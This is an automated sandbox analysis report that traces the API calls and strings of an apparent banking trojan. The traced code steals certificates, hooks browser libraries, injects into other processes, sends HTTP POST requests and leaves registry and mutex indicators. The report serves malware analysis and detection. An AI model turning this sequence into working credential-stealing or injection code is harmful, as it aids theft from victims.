Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0040A2EA, Relevance: 5.2, APIs: 4, Instructions: 197

APIs

Part of subcall function 00418C40: PathCombineW.SHLWAPI(00411F45,00411F45,?), ref: 00418C5F

Part of subcall function 004185D0: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 004185F5
Part of subcall function 004185D0: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00412D27,?,?,00000000), ref: 00418608
Part of subcall function 004185D0: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,00412D27,?,?,00000000), ref: 00418630
Part of subcall function 004185D0: ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 00418648
Part of subcall function 004185D0: VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00412D27,?,?,00000000), ref: 00418662
Part of subcall function 004185D0: CloseHandle.KERNEL32(?), ref: 0041866B

StrStrIA.SHLWAPI(?,?), ref: 0040A410
StrStrIA.SHLWAPI(?,?), ref: 0040A422
StrStrIA.SHLWAPI(?,?), ref: 0040A432
StrStrIA.SHLWAPI(?,?), ref: 0040A444

Part of subcall function 004140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 004140CF

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Part of subcall function 00418678: VirtualFree.KERNEL32(?,00000000,00008000,00000000,0041C83B,?,?,.exe,00000000,00000000,?,.exe,00000006), ref: 00418689
Part of subcall function 00418678: CloseHandle.KERNEL32(?), ref: 00418697

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

Part of subcall function 00418AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00418B23
Part of subcall function 00418AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00418B4A
Part of subcall function 00418AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 00418B94
Part of subcall function 00418AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 00418BC1
Part of subcall function 00418AE4: Sleep.KERNEL32(00000000,?,?), ref: 00418BF1
Part of subcall function 00418AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00418C1F
Part of subcall function 00418AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00418C31

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0041AD5F, Relevance: 5.1, APIs: 4, Instructions: 71

APIs

EnterCriticalSection.KERNEL32(00423FB4,?,?,?,0041B052,?), ref: 0041AD7C

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

LeaveCriticalSection.KERNEL32(00423FB4,?,?,?,0041B052,?), ref: 0041AD9D
EnterCriticalSection.KERNEL32(00423FB4,?,?,?,?,0041B052,?), ref: 0041ADAE

Part of subcall function 00413346: HeapAlloc.KERNEL32(00000008,-00000003,004136F5,?,?,00000000,004141E1,?,?,?,?,?,00414191,?,?,?), ref: 00413368
Part of subcall function 00413346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,004136F5,?,?,00000000,004141E1,?,?,?,?,?,00414191,?,?), ref: 00413379

LeaveCriticalSection.KERNEL32(00423FB4,?,?,?,0041B052,?), ref: 0041AE47

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Analysis Process: taskhost.exe PID: 1292 Parent PID: 3700

Executed Functions

Function 011AD486, Relevance: 12.1, APIs: 8, Instructions: 119

APIs

CertOpenSystemStoreW.CRYPT32(00000000,01194BBC,?,00000000,00000001), ref: 011AD4A1
CertEnumCertificatesInStore.CRYPT32(00000000,00000000,?,00000000,00000001), ref: 011AD4BD
CertEnumCertificatesInStore.CRYPT32(?,00000000,?,00000000,00000001), ref: 011AD4C9
PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,00000000,00000001), ref: 011AD508

Part of subcall function 011A338B: HeapAlloc.KERNEL32(00000008,-00000004,011A4B59,00000000,?,?,?,011A1E08,00000000,011A22ED,?,?,00000000), ref: 011A339C

PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,00000000,00000001), ref: 011AD538
CharLowerW.USER32 ref: 011AD556
GetSystemTime.KERNEL32(?,?,?,00000000,00000001), ref: 011AD561

Part of subcall function 011AD42A: GetUserNameExW.SECUR32(00000002,?,00000001,?,?,?,011AD581,?,?,00000000), ref: 011AD43F

Part of subcall function 011A40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 011A40CF

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

CertCloseStore.CRYPT32(?,00000000), ref: 011AD5EA

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011AD5FB, Relevance: 7.5, APIs: 5, Instructions: 36

APIs

CertOpenSystemStoreW.CRYPT32(00000000,01194BBC,?,00000001,011A2C2A), ref: 011AD606
CertDuplicateCertificateContext.CRYPT32(00000000,?,?,00000001,011A2C2A), ref: 011AD61F
CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,00000001,011A2C2A), ref: 011AD62A
CertEnumCertificatesInStore.CRYPT32(00000000,00000000,00000000,?,?,00000001,011A2C2A), ref: 011AD632
CertCloseStore.CRYPT32(00000000,00000000,?,?,00000001,011A2C2A), ref: 011AD63E

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A64FD, Relevance: 6.0, APIs: 4, Instructions: 32

APIs

socket.WS2_32(00000000,00000001,00000006), ref: 011A6506
bind.WS2_32(00000000,?,-0000001D), ref: 011A6526
listen.WS2_32(00000000,?), ref: 011A6535
#3.WS2_32(00000000), ref: 011A6540

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A20C4, Relevance: 54.5, APIs: 17, Strings: 14, Instructions: 229

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 011A2105
LoadLibraryA.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 011A2172
GetProcAddress.KERNELBASE(?,?,?,?,00000000), ref: 011A21A7
GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 011A21DB
GetProcAddress.KERNEL32(00000000,NtCreateThread,?,?,00000000), ref: 011A21FA
GetProcAddress.KERNEL32(NtCreateUserProcess,?,?,00000000), ref: 011A220C
GetProcAddress.KERNEL32(NtQueryInformationProcess,?,?,00000000), ref: 011A221E
GetProcAddress.KERNEL32(RtlUserThreadStart,?,?,00000000), ref: 011A2230
GetProcAddress.KERNEL32(LdrLoadDll,?,?,00000000), ref: 011A2242
GetProcAddress.KERNEL32(LdrGetDllHandle,?,?,00000000), ref: 011A2254
HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 011A228D
GetProcessHeap.KERNEL32(?,?,00000000), ref: 011A229C
InitializeCriticalSection.KERNEL32(011B400C,?,?,00000000), ref: 011A22C9
WSAStartup.WS2_32(00000202,?), ref: 011A22DF
CreateEventW.KERNEL32(011B2C30,00000001,00000000,00000000,?,?,00000000), ref: 011A2300

Part of subcall function 011A49D2: OpenProcessToken.ADVAPI32(?,00000008,?,76C61857,?,?,011A2326,000000FF,011B2C08,?,?,00000000), ref: 011A49E2
Part of subcall function 011A49D2: GetTokenInformation.KERNELBASE(?,0000000C,00000000,00000004,00000000,?,?,?,011A2326,000000FF,011B2C08), ref: 011A4A0E
Part of subcall function 011A49D2: CloseHandle.KERNEL32(?), ref: 011A4A23

GetLengthSid.ADVAPI32(00000000,000000FF,011B2C08,?,?,00000000), ref: 011A2335

Part of subcall function 011A1E2D: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\admin\AppData\Roaming), ref: 011A1E4B
Part of subcall function 011A1E2D: PathRemoveBackslashW.SHLWAPI(C:\Users\admin\AppData\Roaming), ref: 011A1E5A
Part of subcall function 011A1E2D: GetModuleFileNameW.KERNEL32(00000000,?,00000104,76C61857), ref: 011A1E6E

GetCurrentProcessId.KERNEL32(00000000,01F1F7D0,00000000,?,?,00000000), ref: 011A2362

Part of subcall function 011A1E8F: IsBadReadPtr.KERNEL32(?,?), ref: 011A1EBD

Part of subcall function 011A7A14: StringFromGUID2.OLE32(00000000,?,00000028), ref: 011A7AB5

Part of subcall function 011A1F98: InitializeCriticalSection.KERNEL32(011B3FB4,00000000,76C61857,00000000), ref: 011A1FAF
Part of subcall function 011A1F98: InitializeCriticalSection.KERNEL32(hL?), ref: 011A1FE4
Part of subcall function 011A1F98: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 011A200C
Part of subcall function 011A1F98: ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000), ref: 011A2029
Part of subcall function 011A1F98: CloseHandle.KERNEL32(00000000), ref: 011A203A
Part of subcall function 011A1F98: InitializeCriticalSection.KERNEL32(011B23AC), ref: 011A2081
Part of subcall function 011A1F98: GetModuleHandleW.KERNEL32(nspr4.dll), ref: 011A2093
Part of subcall function 011A1F98: GetModuleHandleW.KERNEL32(nss3.dll), ref: 011A209E

Part of subcall function 011A1EE1: SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 011A1F2C
Part of subcall function 011A1EE1: lstrcmpiW.KERNEL32(?,?,?), ref: 011A1F56

Strings

NtCreateUserProcess, xrefs: 011A21FC
RtlUserThreadStart, xrefs: 011A2220
LdrGetDllHandle, xrefs: 011A2244
C:\Users\admin\AppData\Roaming\Yfheor\vyyno.agx, xrefs: 011A23DB
NtCreateThread, xrefs: 011A21F4
Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769}, xrefs: 011A23F3
GetProcAddress, xrefs: 011A211D
SOFTWARE\Microsoft\Xyuxy, xrefs: 011A23ED
NtQueryInformationProcess, xrefs: 011A220E
LdrLoadDll, xrefs: 011A2232
{3FF5AE44-1EE1-8646-676C-E42BACAD1769}, xrefs: 011A23AB
SOFTWARE\Microsoft\Xyuxy, xrefs: 011A23E1
LoadLibraryA, xrefs: 011A2127
SOFTWARE\Microsoft\Xyuxy, xrefs: 011A23F9

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A1F98, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 91

APIs

InitializeCriticalSection.KERNEL32(011B3FB4,00000000,76C61857,00000000), ref: 011A1FAF
InitializeCriticalSection.KERNEL32(hL?), ref: 011A1FE4

Part of subcall function 011A2828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 011A28A1

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 011A200C
ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000), ref: 011A2029
CloseHandle.KERNEL32(00000000), ref: 011A203A

Part of subcall function 011A9D6D: InitializeCriticalSection.KERNEL32(011B3F24,00000000,7718F8FF), ref: 011A9D8F
Part of subcall function 011A9D6D: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000), ref: 011A9E63

Part of subcall function 011AB4D3: GetModuleHandleW.KERNEL32(nspr4.dll,00000000,7718F8FF,00000000), ref: 011AB4F0

InitializeCriticalSection.KERNEL32(011B23AC), ref: 011A2081

Part of subcall function 0119E0FB: GetCurrentThreadId.KERNEL32(7718F8FF), ref: 0119E108
Part of subcall function 0119E0FB: GetThreadDesktop.USER32(00000000), ref: 0119E10F
Part of subcall function 0119E0FB: GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 0119E128

GetModuleHandleW.KERNEL32(nspr4.dll), ref: 011A2093
GetModuleHandleW.KERNEL32(nss3.dll), ref: 011A209E

Part of subcall function 0119C103: GetModuleHandleW.KERNEL32(nss3.dll,00000000,76C619C1,00000000,011A20A9), ref: 0119C111
Part of subcall function 0119C103: GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket,00000000,76C619C1,00000000,011A20A9), ref: 0119C125
Part of subcall function 0119C103: GetProcAddress.KERNEL32(00000000,PR_Close), ref: 0119C132
Part of subcall function 0119C103: GetProcAddress.KERNEL32(00000000,PR_Read), ref: 0119C13F
Part of subcall function 0119C103: GetProcAddress.KERNEL32(00000000,PR_Write), ref: 0119C14C

Strings

nspr4.dll, xrefs: 011A208E
nss3.dll, xrefs: 011A2099
hL?, xrefs: 011A1FB5

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A3048, Relevance: 18.1, APIs: 12, Instructions: 138

APIs

Part of subcall function 011A20C4: GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 011A2105
Part of subcall function 011A20C4: LoadLibraryA.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 011A2172
Part of subcall function 011A20C4: GetProcAddress.KERNELBASE(?,?,?,?,00000000), ref: 011A21A7
Part of subcall function 011A20C4: GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 011A21DB
Part of subcall function 011A20C4: GetProcAddress.KERNEL32(00000000,NtCreateThread,?,?,00000000), ref: 011A21FA
Part of subcall function 011A20C4: GetProcAddress.KERNEL32(NtCreateUserProcess,?,?,00000000), ref: 011A220C
Part of subcall function 011A20C4: GetProcAddress.KERNEL32(NtQueryInformationProcess,?,?,00000000), ref: 011A221E
Part of subcall function 011A20C4: GetProcAddress.KERNEL32(RtlUserThreadStart,?,?,00000000), ref: 011A2230
Part of subcall function 011A20C4: GetProcAddress.KERNEL32(LdrLoadDll,?,?,00000000), ref: 011A2242
Part of subcall function 011A20C4: GetProcAddress.KERNEL32(LdrGetDllHandle,?,?,00000000), ref: 011A2254
Part of subcall function 011A20C4: HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 011A228D
Part of subcall function 011A20C4: GetProcessHeap.KERNEL32(?,?,00000000), ref: 011A229C
Part of subcall function 011A20C4: InitializeCriticalSection.KERNEL32(011B400C,?,?,00000000), ref: 011A22C9
Part of subcall function 011A20C4: WSAStartup.WS2_32(00000202,?), ref: 011A22DF
Part of subcall function 011A20C4: CreateEventW.KERNEL32(011B2C30,00000001,00000000,00000000,?,?,00000000), ref: 011A2300
Part of subcall function 011A20C4: GetLengthSid.ADVAPI32(00000000,000000FF,011B2C08,?,?,00000000), ref: 011A2335
Part of subcall function 011A20C4: GetCurrentProcessId.KERNEL32(00000000,01F1F7D0,00000000,?,?,00000000), ref: 011A2362

SetErrorMode.KERNEL32(00008007,00000000), ref: 011A306F
GetCommandLineW.KERNEL32(?), ref: 011A3079
CommandLineToArgvW.SHELL32(00000000), ref: 011A3080
LocalFree.KERNEL32(00000000), ref: 011A30D5

Part of subcall function 0119E0FB: GetCurrentThreadId.KERNEL32(7718F8FF), ref: 0119E108
Part of subcall function 0119E0FB: GetThreadDesktop.USER32(00000000), ref: 0119E10F
Part of subcall function 0119E0FB: GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 0119E128

Part of subcall function 01195BF6: GetCurrentThread.KERNEL32(00000001,?,?,?,?,?,?,?,?,011A30F6), ref: 01195C03
Part of subcall function 01195BF6: SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,011A30F6), ref: 01195C0A
Part of subcall function 01195BF6: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,011A30F6), ref: 01195C1C
Part of subcall function 01195BF6: SetEvent.KERNEL32(011B2868,?,00000001), ref: 01195C69
Part of subcall function 01195BF6: GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 01195C76

Part of subcall function 0119DF74: DeleteObject.GDI32(00000000), ref: 0119DF87
Part of subcall function 0119DF74: CloseHandle.KERNEL32(00000000), ref: 0119DF97
Part of subcall function 0119DF74: TlsFree.KERNEL32(00000000,00000000,011B2868,00000000,0119E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0119DFA2
Part of subcall function 0119DF74: CloseHandle.KERNEL32(00000000), ref: 0119DFB0
Part of subcall function 0119DF74: UnmapViewOfFile.KERNEL32(00000000,00000000,011B2868,00000000,0119E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0119DFBA
Part of subcall function 0119DF74: CloseHandle.KERNEL32(00000000), ref: 0119DFC7
Part of subcall function 0119DF74: SelectObject.GDI32(00000000,00000000), ref: 0119DFE1
Part of subcall function 0119DF74: DeleteObject.GDI32(00000000), ref: 0119DFF2
Part of subcall function 0119DF74: DeleteDC.GDI32(00000000), ref: 0119DFFF
Part of subcall function 0119DF74: CloseHandle.KERNEL32(00000000), ref: 0119E010
Part of subcall function 0119DF74: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0119E01F
Part of subcall function 0119DF74: PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 0119E038

Part of subcall function 011A2B08: GetModuleHandleW.KERNEL32(?), ref: 011A2B1F
Part of subcall function 011A2B08: GetProcAddress.KERNEL32(00000000,?), ref: 011A2B41

Part of subcall function 011A2D01: CreateMutexW.KERNEL32(011B2C30,00000001,?,32901130,?,00000001,?), ref: 011A2D91
Part of subcall function 011A2D01: GetLastError.KERNEL32 ref: 011A2DA3
Part of subcall function 011A2D01: CloseHandle.KERNEL32(000001E6), ref: 011A2DBA
Part of subcall function 011A2D01: ExitWindowsEx.USER32(00000014,80000000), ref: 011A2DFD
Part of subcall function 011A2D01: OpenEventW.KERNEL32(00000002,00000000,?,1A43533F,?,00000001), ref: 011A2E1C
Part of subcall function 011A2D01: SetEvent.KERNEL32(00000000), ref: 011A2E29
Part of subcall function 011A2D01: CloseHandle.KERNEL32(00000000), ref: 011A2E30
Part of subcall function 011A2D01: CloseHandle.KERNEL32(000001E6), ref: 011A2E42
Part of subcall function 011A2D01: ReadProcessMemory.KERNEL32(000000FF,01240014,00000002,00000001,00000000,?,19367401,?,00000001,8889347B,00000002), ref: 011A2EA6
Part of subcall function 011A2D01: Sleep.KERNEL32(000001F4), ref: 011A2EB8
Part of subcall function 011A2D01: IsWellKnownSid.ADVAPI32(01F1F7D0,00000016,?,19367401,?,00000001,8889347B,00000002), ref: 011A2EC9
Part of subcall function 011A2D01: ReadProcessMemory.KERNEL32(000000FF,01240014,00000000,00000001,00000000), ref: 011A2EF1
Part of subcall function 011A2D01: GetFileAttributesExW.KERNEL32({3FF5AE44-1EE1-8646-676C-E42BACAD1769},78F16360,0000000C), ref: 011A2F0D
Part of subcall function 011A2D01: VirtualFree.KERNEL32(?,00000000,00008000,?,00000001,?,?), ref: 011A2F50
Part of subcall function 011A2D01: CreateEventW.KERNEL32(011B2C30,00000001,00000000,?,1A43533F,?,00000001,00000001,?,00000000,C:\Users\admin\AppData\Roaming,00000000,?,?,?), ref: 011A2FCE
Part of subcall function 011A2D01: WaitForSingleObject.KERNEL32(?,000000FF), ref: 011A2FE7
Part of subcall function 011A2D01: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 011A2FF7
Part of subcall function 011A2D01: CloseHandle.KERNEL32(0000000C), ref: 011A300D
Part of subcall function 011A2D01: CloseHandle.KERNEL32(?), ref: 011A3013
Part of subcall function 011A2D01: CloseHandle.KERNEL32(?), ref: 011A3016

Sleep.KERNEL32(000000FF,?,00000001), ref: 011A312B
ExitProcess.KERNEL32(00000000,00000000), ref: 011A313C
OpenProcess.KERNEL32(0000047A,00000000,?,?,00000000), ref: 011A3157

Part of subcall function 011A2542: DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002), ref: 011A2574
Part of subcall function 011A2542: WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000,?,?,?,?,011A316D,?,00000000,?,?,00000000), ref: 011A25AB
Part of subcall function 011A2542: WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000,?,?,?,?,011A316D,?,00000000,?,?,00000000), ref: 011A25CB
Part of subcall function 011A2542: VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,00000000,?,00000000,?,?,?,?,011A316D,?,00000000), ref: 011A261A

CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-02355903,00000000,00000000,00000000), ref: 011A3185
WaitForSingleObject.KERNEL32(00000000,00002710), ref: 011A3198
CloseHandle.KERNEL32(?), ref: 011A31A1
VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,?,00000000), ref: 011A31B5
CloseHandle.KERNEL32(00000000), ref: 011A31BC

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 01194DBD, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151

APIs

Part of subcall function 011A2507: CreateMutexW.KERNELBASE(011B2C30,00000000,?,?,?,?,?), ref: 011A2528

Part of subcall function 011A262D: WaitForSingleObject.KERNEL32(00000000,0119776D), ref: 011A2635

WaitForSingleObject.KERNEL32(000003E8,?), ref: 01194E28
CloseHandle.KERNEL32(?), ref: 01194F89

Part of subcall function 0119E959: CreateMutexW.KERNELBASE(011B2C30,00000000,Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769},?,?,01194E69,?,?,?,743C152E,00000002), ref: 0119E97F

WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 01194EB9
WSAEventSelect.WS2_32(00000000,00000000,00000000), ref: 01194EFA
WSAIoctl.WS2_32(00000000,8004667E,?,00000004,00000000,00000000,?,00000000,00000000), ref: 01194F1A

Part of subcall function 011A67B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 011A67CC

Part of subcall function 011A4DF0: CreateThread.KERNEL32(00000000,?,00000000,0119748F,00000000,0119748F), ref: 011A4E04
Part of subcall function 011A4DF0: CloseHandle.KERNEL32(00000000), ref: 011A4E0F

accept.WS2_32(?,00000000,00000000), ref: 01194F45
WaitForMultipleObjects.KERNEL32(?,?,00000000,00000000), ref: 01194F59

Part of subcall function 011A675E: shutdown.WS2_32(?,00000002), ref: 011A6766
Part of subcall function 011A675E: #3.WS2_32(?), ref: 011A676D

CloseHandle.KERNEL32(?), ref: 01194F7A

Part of subcall function 011A6B8E: ReleaseMutex.KERNEL32(00000000,011A3021,?,?,?), ref: 011A6B92

Part of subcall function 0119E89E: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?,76C605D7,00000000), ref: 0119E8E0

Part of subcall function 01194C68: getsockname.WS2_32(?,?,?), ref: 01194CBE
Part of subcall function 01194C68: CloseHandle.KERNEL32(?), ref: 01194CE2

Strings

K2w, xrefs: 01194EC7

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011963F0, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 216

APIs

Part of subcall function 011A2507: CreateMutexW.KERNELBASE(011B2C30,00000000,?,?,?,?,?), ref: 011A2528

Part of subcall function 011A262D: WaitForSingleObject.KERNEL32(00000000,0119776D), ref: 011A2635

Part of subcall function 01195ECF: PathRemoveFileSpecW.SHLWAPI(C:\Users\admin\AppData\Roaming\Yfheor), ref: 01195F07
Part of subcall function 01195ECF: PathRenameExtensionW.SHLWAPI(?,.tmp), ref: 01195F23
Part of subcall function 01195ECF: GetFileAttributesW.KERNEL32(C:\Users\admin\AppData\Roaming\Yfheor\vyyno.agx,C:\Users\admin\AppData\Roaming\Yfheor,C:\Users\admin\AppData\Roaming\Yfheor,?,?,01196527,00000000,?,00000000,00000330,?,?,00000102), ref: 01195F46

GetFileAttributesW.KERNEL32(?,00000000,?,00000000,00000330,?,?,00000102), ref: 01196538
GetFileAttributesW.KERNELBASE(C:\Users\admin\AppData\Roaming\Yfheor\vyyno.agx), ref: 0119654B
CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 01196571
CloseHandle.KERNEL32(00000000), ref: 0119658F
lstrcmpiW.KERNEL32(?,?), ref: 011965BF
MoveFileExW.KERNEL32(?,?,0000000B), ref: 011965E7

Part of subcall function 01196BD7: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?), ref: 01196C00

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

Part of subcall function 01196010: GetTickCount.KERNEL32(0000271B,00020000,?,00002719,00020000,?,?,00000000,00000000), ref: 0119610F
Part of subcall function 01196010: GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,00000002,?,00000000,00000000), ref: 01196162
Part of subcall function 01196010: GetModuleFileNameW.KERNEL32(00000000,?,00000103,?,00000000,00000000), ref: 011961A4
Part of subcall function 01196010: GetUserNameExW.SECUR32(00000002,?,00000104), ref: 011961E6

Part of subcall function 0119680D: WaitForSingleObject.KERNEL32(?,00001388), ref: 0119685A
Part of subcall function 0119680D: Sleep.KERNEL32(00001388,?,?,?,00000000,?,?,-78D0C214,00000002), ref: 01196869

Part of subcall function 011A9354: FlushFileBuffers.KERNEL32(00000000), ref: 011A9360
Part of subcall function 011A9354: CloseHandle.KERNEL32(?), ref: 011A9368

Part of subcall function 011A8716: SetFileAttributesW.KERNELBASE(00000080,00000080,011AB4CD,?), ref: 011A871F
Part of subcall function 011A8716: DeleteFileW.KERNELBASE(?), ref: 011A8729

Part of subcall function 011A86EF: GetFileSizeEx.KERNEL32(?,?,?,?,?,01196588,00000000), ref: 011A86FB

WaitForSingleObject.KERNEL32(00007530,?), ref: 0119668B

Part of subcall function 011A6B8E: ReleaseMutex.KERNEL32(00000000,011A3021,?,?,?), ref: 011A6B92

Strings

C:\Users\admin\AppData\Roaming\Yfheor\vyyno.agx, xrefs: 01196545, 0119654A

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 0119773A, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 160

APIs

Part of subcall function 011A2507: CreateMutexW.KERNELBASE(011B2C30,00000000,?,?,?,?,?), ref: 011A2528

GetCurrentThread.KERNEL32(000000F1,743C1521,00000002), ref: 0119775B
SetThreadPriority.KERNEL32(00000000), ref: 01197762

Part of subcall function 011A262D: WaitForSingleObject.KERNEL32(00000000,0119776D), ref: 011A2635

WaitForSingleObject.KERNEL32(0000EA60), ref: 01197780

Part of subcall function 011A9A9E: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?), ref: 011A9ADD

CreateMutexW.KERNEL32(011B2C30,00000001,?,20000000), ref: 01197843
GetLastError.KERNEL32 ref: 01197853
CloseHandle.KERNEL32(00000000), ref: 01197861

Part of subcall function 011A338B: HeapAlloc.KERNEL32(00000008,-00000004,011A4B59,00000000,?,?,?,011A1E08,00000000,011A22ED,?,?,00000000), ref: 011A339C

Part of subcall function 011A4DF0: CreateThread.KERNEL32(00000000,?,00000000,0119748F,00000000,0119748F), ref: 011A4E04
Part of subcall function 011A4DF0: CloseHandle.KERNEL32(00000000), ref: 011A4E0F

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

Part of subcall function 011A40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 011A40CF

WaitForSingleObject.KERNEL32(0000EA60), ref: 01197919

Part of subcall function 011A6B8E: ReleaseMutex.KERNEL32(00000000,011A3021,?,?,?), ref: 011A6B92

Strings

Global\%08X%08X%08X, xrefs: 0119781D

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A50A3, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 67

APIs

HttpOpenRequestA.WININET(00000003,POST,00000000,HTTP/1.1,00000000,011B2000,8404F700,00000000), ref: 011A50EB
HttpSendRequestA.WININET(00000000,Connection: close,00000013,?,?), ref: 011A5112
HttpQueryInfoA.WININET(00000000,20000013,00000000,00000000,00000000), ref: 011A5137
InternetCloseHandle.WININET(00000000), ref: 011A514F

Strings

Connection: close, xrefs: 011A5103, 011A5110
POST, xrefs: 011A50C9
GET, xrefs: 011A50D0, 011A50E7
